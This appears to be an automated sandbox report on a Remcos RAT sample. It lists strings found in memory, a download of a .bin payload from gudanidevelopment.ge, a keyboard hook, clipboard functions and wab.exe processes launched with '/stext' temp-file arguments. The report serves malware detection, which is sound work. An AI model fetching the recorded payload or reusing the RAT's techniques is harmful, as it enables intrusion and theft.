              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
              Source: bhv7197.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
              Source: bhv7197.tmp.9.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
              Source: wab.exe, 00000009.00000003.49633463217.00000000051C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: bhv7197.tmp.9.drString found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
              Source: bhv7197.tmp.9.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: wab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://(
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pah
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie(
              Source: wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49624792000.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFl
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/o
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/de-ch/homepage/secure/silentpassport?secure=true&lc=2055
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: bhv7197.tmp.9.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: gudanidevelopment.ge
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Contains functionality to modify clipboard data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,9_2_0040987A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,9_2_004098E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406B9A EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_00406B9A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00406C3D EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_00406C3D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004068B5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,11_2_004072B5
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_00405461

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 2856, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040338F
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00404C9E5_2_00404C9E
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_00406B155_2_00406B15
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_004072EC5_2_004072EC
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeCode function: 5_2_6F261B5F5_2_6F261B5F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352E71947_2_352E7194
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_352DB5C17_2_352DB5C1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00406E8F9_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B0409_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0043610D9_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004473109_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044A4909_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040755A9_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0043C5609_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B6109_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044D6C09_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004476F09_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044B8709_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044081D9_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004149579_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004079EE9_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00407AEB9_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044AA809_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00412AA99_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404B749_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404B039_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0044BBD89_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404BE59_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00404C769_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00415CFE9_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00416D729_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00446D309_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00446D8B9_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040D04410_2_0040D044
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040503810_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004050A910_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040511A10_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004051AB10_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004382F310_2_004382F3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043057510_2_00430575
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043B67110_2_0043B671
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0041F6CD10_2_0041F6CD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004119CF10_2_004119CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00439B1110_2_00439B11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00438E5410_2_00438E54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_00412F6710_2_00412F67
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0043CF1810_2_0043CF18
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004050C211_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004014AB11_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040513311_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004051A411_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040124611_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040CA4611_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040523511_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004032C811_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040168911_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00402F6011_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00412968 appears 78 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00421A32 appears 43 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044407A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_03DB916E Sleep,NtProtectVirtualMemory,7_2_03DB916E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_00401806 NtdllDefWindowProc_W,9_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_004018C0 NtdllDefWindowProc_W,9_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004016FC NtdllDefWindowProc_A,10_2_004016FC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_004017B6 NtdllDefWindowProc_A,10_2_004017B6
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00402CAC NtdllDefWindowProc_A,11_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00402D66 NtdllDefWindowProc_A,11_2_00402D66
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeStatic PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: Tramper.exe.7.drStatic PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeVirustotal: Detection: 20%
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeFile read: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeJump to behavior
              Source: #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_10-33004
              Source: unknownProcess created: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzl
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjz
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngaybJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzlJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjzJump to behavior
              Source: C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
